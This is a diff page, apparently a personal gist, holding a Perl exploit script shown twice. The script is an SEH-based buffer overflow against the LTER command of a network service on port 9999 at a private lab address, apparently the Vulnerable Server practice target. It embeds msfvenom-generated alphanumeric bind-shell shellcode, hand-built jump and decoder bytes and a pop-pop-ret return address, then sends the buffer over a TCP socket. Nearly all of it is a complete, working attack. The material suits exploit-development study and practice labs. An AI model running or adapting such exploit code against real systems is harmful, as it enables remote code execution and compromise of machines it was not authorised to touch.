0xbadjuju · February 7, 2020 15:32
diff --git a/lter.pl b/lter.pl
 #!/usr/bin/perl

 use strict;
 use warnings;

 use Encode qw/encode/;
 use Socket;

 my $target = inet_aton("192.168.99.144");
 my $port = 9999;
 my $portaddr = sockaddr_in($port, $target);

 #0x01 - 0x7f
 #45336E45
 my $heading = "LTER /.:/";

 # msfvenom -p windows/shell_bind_tcp -f perl -e x86/alpha_mixed BUFFERREGISTER=EBX
 # Payload size: 710 bytes    
 my $payload =
 "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .                                                      
 "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .                                                      
 "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .                                                      
 "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4a\x48" .                                                      
 "\x4c\x42\x33\x30\x35\x50\x33\x30\x61\x70\x4f\x79\x7a\x45" .                                                      
 "\x66\x51\x4f\x30\x33\x54\x4c\x4b\x62\x70\x34\x70\x6c\x4b" .                                                      
 "\x31\x42\x44\x4c\x6e\x6b\x51\x42\x65\x44\x6e\x6b\x44\x32" .                                                      
 "\x67\x58\x64\x4f\x6d\x67\x61\x5a\x74\x66\x30\x31\x6b\x4f" .                                                      
 "\x4e\x4c\x77\x4c\x55\x31\x61\x6c\x45\x52\x64\x6c\x51\x30" .                                                      
 "\x59\x51\x48\x4f\x34\x4d\x55\x51\x39\x57\x69\x72\x68\x72" .                                                      
 "\x53\x62\x62\x77\x4c\x4b\x66\x32\x46\x70\x4e\x6b\x70\x4a" .                                                      
 "\x47\x4c\x4e\x6b\x72\x6c\x42\x31\x73\x48\x5a\x43\x33\x78" .                                                      
 "\x56\x61\x5a\x71\x62\x71\x4c\x4b\x43\x69\x77\x50\x67\x71" .                                                      
 "\x38\x53\x6c\x4b\x73\x79\x46\x78\x48\x63\x47\x4a\x31\x59" .                                                      
 "\x4e\x6b\x66\x54\x6e\x6b\x53\x31\x59\x46\x46\x51\x59\x6f" .                                                      
 "\x6c\x6c\x49\x51\x48\x4f\x34\x4d\x35\x51\x39\x57\x35\x68" .                                                      
 "\x4d\x30\x51\x65\x48\x76\x55\x53\x53\x4d\x4c\x38\x57\x4b" .                                                      
 "\x43\x4d\x77\x54\x44\x35\x69\x74\x72\x78\x6e\x6b\x36\x38" .                                                      
 "\x31\x34\x43\x31\x68\x53\x63\x56\x4e\x6b\x54\x4c\x42\x6b" .                                                      
 "\x6c\x4b\x66\x38\x65\x4c\x55\x51\x4e\x33\x4e\x6b\x44\x44" .
 "\x6c\x4b\x73\x31\x5a\x70\x4c\x49\x70\x44\x46\x44\x64\x64" .
 "\x31\x4b\x53\x6b\x31\x71\x66\x39\x32\x7a\x62\x71\x69\x6f" .
 "\x4d\x30\x43\x6f\x43\x6f\x71\x4a\x4e\x6b\x66\x72\x7a\x4b" .
 "\x4c\x4d\x73\x6d\x75\x38\x77\x43\x66\x52\x35\x50\x47\x70" .
 "\x45\x38\x43\x47\x42\x53\x56\x52\x43\x6f\x70\x54\x61\x78" .
 "\x42\x6c\x63\x47\x51\x36\x76\x67\x6b\x4f\x48\x55\x4c\x78" .
 "\x6a\x30\x37\x71\x57\x70\x75\x50\x61\x39\x4f\x34\x76\x34" .
 "\x62\x70\x62\x48\x35\x79\x6b\x30\x32\x4b\x73\x30\x39\x6f" .
 "\x39\x45\x43\x5a\x74\x48\x31\x49\x42\x70\x6a\x42\x69\x6d" .
 "\x57\x30\x72\x70\x61\x50\x70\x50\x72\x48\x58\x6a\x36\x6f" .
 "\x6b\x6f\x4b\x50\x39\x6f\x4e\x35\x5a\x37\x73\x58\x76\x62" .
 "\x35\x50\x67\x61\x53\x6c\x4d\x59\x4a\x46\x61\x7a\x34\x50" .
 "\x56\x36\x43\x67\x65\x38\x49\x52\x49\x4b\x54\x77\x72\x47" .
 "\x49\x6f\x7a\x75\x53\x67\x62\x48\x38\x37\x49\x79\x34\x78" .
 "\x69\x6f\x6b\x4f\x38\x55\x53\x67\x32\x48\x61\x64\x78\x6c" .
 "\x37\x4b\x59\x71\x69\x6f\x49\x45\x42\x77\x4c\x57\x75\x38" .
 "\x51\x65\x42\x4e\x32\x6d\x75\x31\x4b\x4f\x4e\x35\x45\x38" .
 "\x71\x73\x42\x4d\x50\x64\x43\x30\x4b\x39\x6b\x53\x66\x37" .
 "\x31\x47\x56\x37\x30\x31\x7a\x56\x52\x4a\x42\x32\x52\x79" .
 "\x72\x76\x78\x62\x39\x6d\x75\x36\x79\x57\x33\x74\x36\x44" .
 "\x55\x6c\x37\x71\x36\x61\x4e\x6d\x52\x64\x61\x34\x66\x70" .
 "\x78\x46\x45\x50\x43\x74\x70\x54\x62\x70\x73\x66\x62\x76" .
 "\x62\x76\x70\x46\x56\x36\x50\x4e\x32\x76\x61\x46\x31\x43" .
 "\x43\x66\x50\x68\x61\x69\x7a\x6c\x47\x4f\x4f\x76\x59\x6f" .
 "\x7a\x75\x6f\x79\x6b\x50\x42\x6e\x52\x76\x63\x76\x59\x6f" .
 "\x34\x70\x71\x78\x43\x38\x6c\x47\x67\x6d\x65\x30\x79\x6f" .
 "\x6b\x65\x4d\x6b\x68\x70\x58\x35\x6d\x72\x70\x56\x35\x38" .
 "\x4e\x46\x6f\x65\x6f\x4d\x4f\x6d\x39\x6f\x49\x45\x55\x6c" .
 "\x45\x56\x53\x4c\x77\x7a\x6d\x50\x79\x6b\x49\x70\x71\x65" .
 "\x55\x55\x4f\x4b\x53\x77\x76\x73\x44\x32\x72\x4f\x62\x4a" .
 "\x55\x50\x51\x43\x79\x6f\x48\x55\x41\x41";

 my $padding1 = "A" x (3391 - length($payload));#3515;3519;

 my $jmplong = 
 # PUSH EBP
 # POP EAX
 # SUB EAX, 777
 # PUSH EAX
 # POP EBX
 "\x55" .
 "\x58" .
 "\x66\x05\x09\x03" .
 "\x50" .
 "\x5b" .
 # PUSH ESP
 # POP EAX
 # ADD AX, 0x1194 ;keep ESP stack aligned
 # PUSH EAX
 # POP ESP
 "\x54\x58" .
 "\x66\x05\x58\x11" .
 "\x50" .
 "\x5c" .
 # Decoder - 31 bytes
 # JMP EBX
 "\x25\x4A\x4D\x4E\x55" .
 "\x25\x35\x32\x31\x2A" .
 "\x05\x77\x62\x41\x41" .
 "\x05\x66\x52\x41\x41" .
 "\x05\x55\x62\x41\x41" .
 "\x2D\x33\x33\x33\x33" .
 "\x50";

 my $padding2 = "B" x (124 - length($jmplong));#940;

 # JUMP SHORT -122
 # Gets adjusted by the filter from FF -> 7F (80)
 my $jmpshort = "\x77\xFF\x76\xFF";

 #0x6250195e pop edi; pop ebp; ret
 my $poppopret = "\x5e\x19\x50\x62";

 my $message = $heading . $payload . $padding1 . $jmplong . $padding2 . $jmpshort .  $poppopret . "C" x 50;

 print $message . "\n\n";

 print length($message) . "\n\n";

 socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
 	or die "Can't create a socket $!\n";

 connect(SOCKET , $portaddr) 
   	or die "Unable to connect to socket $!\n";

 send(SOCKET, $message, 0) == length($message)
 	or die "cannot send to $target($port): $!";

 close SOCKET or die "close: $!"
	#!/usr/bin/perl

	use strict;
	use warnings;

	use Encode qw/encode/;
	use Socket;

	my $target = inet_aton("192.168.99.144");
	my $port = 9999;
	my $portaddr = sockaddr_in($port, $target);

	#0x01 - 0x7f
	#45336E45
	my $heading = "LTER /.:/";

	# msfvenom -p windows/shell_bind_tcp -f perl -e x86/alpha_mixed BUFFERREGISTER=EBX
	# Payload size: 710 bytes
	my $payload =
	"\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
	"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
	"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
	"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4a\x48" .
	"\x4c\x42\x33\x30\x35\x50\x33\x30\x61\x70\x4f\x79\x7a\x45" .
	"\x66\x51\x4f\x30\x33\x54\x4c\x4b\x62\x70\x34\x70\x6c\x4b" .
	"\x31\x42\x44\x4c\x6e\x6b\x51\x42\x65\x44\x6e\x6b\x44\x32" .
	"\x67\x58\x64\x4f\x6d\x67\x61\x5a\x74\x66\x30\x31\x6b\x4f" .
	"\x4e\x4c\x77\x4c\x55\x31\x61\x6c\x45\x52\x64\x6c\x51\x30" .
	"\x59\x51\x48\x4f\x34\x4d\x55\x51\x39\x57\x69\x72\x68\x72" .
	"\x53\x62\x62\x77\x4c\x4b\x66\x32\x46\x70\x4e\x6b\x70\x4a" .
	"\x47\x4c\x4e\x6b\x72\x6c\x42\x31\x73\x48\x5a\x43\x33\x78" .
	"\x56\x61\x5a\x71\x62\x71\x4c\x4b\x43\x69\x77\x50\x67\x71" .
	"\x38\x53\x6c\x4b\x73\x79\x46\x78\x48\x63\x47\x4a\x31\x59" .
	"\x4e\x6b\x66\x54\x6e\x6b\x53\x31\x59\x46\x46\x51\x59\x6f" .
	"\x6c\x6c\x49\x51\x48\x4f\x34\x4d\x35\x51\x39\x57\x35\x68" .
	"\x4d\x30\x51\x65\x48\x76\x55\x53\x53\x4d\x4c\x38\x57\x4b" .
	"\x43\x4d\x77\x54\x44\x35\x69\x74\x72\x78\x6e\x6b\x36\x38" .
	"\x31\x34\x43\x31\x68\x53\x63\x56\x4e\x6b\x54\x4c\x42\x6b" .
	"\x6c\x4b\x66\x38\x65\x4c\x55\x51\x4e\x33\x4e\x6b\x44\x44" .
	"\x6c\x4b\x73\x31\x5a\x70\x4c\x49\x70\x44\x46\x44\x64\x64" .
	"\x31\x4b\x53\x6b\x31\x71\x66\x39\x32\x7a\x62\x71\x69\x6f" .
	"\x4d\x30\x43\x6f\x43\x6f\x71\x4a\x4e\x6b\x66\x72\x7a\x4b" .
	"\x4c\x4d\x73\x6d\x75\x38\x77\x43\x66\x52\x35\x50\x47\x70" .
	"\x45\x38\x43\x47\x42\x53\x56\x52\x43\x6f\x70\x54\x61\x78" .
	"\x42\x6c\x63\x47\x51\x36\x76\x67\x6b\x4f\x48\x55\x4c\x78" .
	"\x6a\x30\x37\x71\x57\x70\x75\x50\x61\x39\x4f\x34\x76\x34" .
	"\x62\x70\x62\x48\x35\x79\x6b\x30\x32\x4b\x73\x30\x39\x6f" .
	"\x39\x45\x43\x5a\x74\x48\x31\x49\x42\x70\x6a\x42\x69\x6d" .
	"\x57\x30\x72\x70\x61\x50\x70\x50\x72\x48\x58\x6a\x36\x6f" .
	"\x6b\x6f\x4b\x50\x39\x6f\x4e\x35\x5a\x37\x73\x58\x76\x62" .
	"\x35\x50\x67\x61\x53\x6c\x4d\x59\x4a\x46\x61\x7a\x34\x50" .
	"\x56\x36\x43\x67\x65\x38\x49\x52\x49\x4b\x54\x77\x72\x47" .
	"\x49\x6f\x7a\x75\x53\x67\x62\x48\x38\x37\x49\x79\x34\x78" .
	"\x69\x6f\x6b\x4f\x38\x55\x53\x67\x32\x48\x61\x64\x78\x6c" .
	"\x37\x4b\x59\x71\x69\x6f\x49\x45\x42\x77\x4c\x57\x75\x38" .
	"\x51\x65\x42\x4e\x32\x6d\x75\x31\x4b\x4f\x4e\x35\x45\x38" .
	"\x71\x73\x42\x4d\x50\x64\x43\x30\x4b\x39\x6b\x53\x66\x37" .
	"\x31\x47\x56\x37\x30\x31\x7a\x56\x52\x4a\x42\x32\x52\x79" .
	"\x72\x76\x78\x62\x39\x6d\x75\x36\x79\x57\x33\x74\x36\x44" .
	"\x55\x6c\x37\x71\x36\x61\x4e\x6d\x52\x64\x61\x34\x66\x70" .
	"\x78\x46\x45\x50\x43\x74\x70\x54\x62\x70\x73\x66\x62\x76" .
	"\x62\x76\x70\x46\x56\x36\x50\x4e\x32\x76\x61\x46\x31\x43" .
	"\x43\x66\x50\x68\x61\x69\x7a\x6c\x47\x4f\x4f\x76\x59\x6f" .
	"\x7a\x75\x6f\x79\x6b\x50\x42\x6e\x52\x76\x63\x76\x59\x6f" .
	"\x34\x70\x71\x78\x43\x38\x6c\x47\x67\x6d\x65\x30\x79\x6f" .
	"\x6b\x65\x4d\x6b\x68\x70\x58\x35\x6d\x72\x70\x56\x35\x38" .
	"\x4e\x46\x6f\x65\x6f\x4d\x4f\x6d\x39\x6f\x49\x45\x55\x6c" .
	"\x45\x56\x53\x4c\x77\x7a\x6d\x50\x79\x6b\x49\x70\x71\x65" .
	"\x55\x55\x4f\x4b\x53\x77\x76\x73\x44\x32\x72\x4f\x62\x4a" .
	"\x55\x50\x51\x43\x79\x6f\x48\x55\x41\x41";

	my $padding1 = "A" x (3391 - length($payload));#3515;3519;

	my $jmplong =
	# PUSH EBP
	# POP EAX
	# SUB EAX, 777
	# PUSH EAX
	# POP EBX
	"\x55" .
	"\x58" .
	"\x66\x05\x09\x03" .
	"\x50" .
	"\x5b" .
	# PUSH ESP
	# POP EAX
	# ADD AX, 0x1194 ;keep ESP stack aligned
	# PUSH EAX
	# POP ESP
	"\x54\x58" .
	"\x66\x05\x58\x11" .
	"\x50" .
	"\x5c" .
	# Decoder - 31 bytes
	# JMP EBX
	"\x25\x4A\x4D\x4E\x55" .
	"\x25\x35\x32\x31\x2A" .
	"\x05\x77\x62\x41\x41" .
	"\x05\x66\x52\x41\x41" .
	"\x05\x55\x62\x41\x41" .
	"\x2D\x33\x33\x33\x33" .
	"\x50";

	my $padding2 = "B" x (124 - length($jmplong));#940;

	# JUMP SHORT -122
	# Gets adjusted by the filter from FF -> 7F (80)
	my $jmpshort = "\x77\xFF\x76\xFF";

	#0x6250195e pop edi; pop ebp; ret
	my $poppopret = "\x5e\x19\x50\x62";

	my $message = $heading . $payload . $padding1 . $jmplong . $padding2 . $jmpshort . $poppopret . "C" x 50;

	print $message . "\n\n";

	print length($message) . "\n\n";

	socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
	or die "Can't create a socket $!\n";

	connect(SOCKET , $portaddr)
	or die "Unable to connect to socket $!\n";

	send(SOCKET, $message, 0) == length($message)
	or die "cannot send to $target($port): $!";

	close SOCKET or die "close: $!"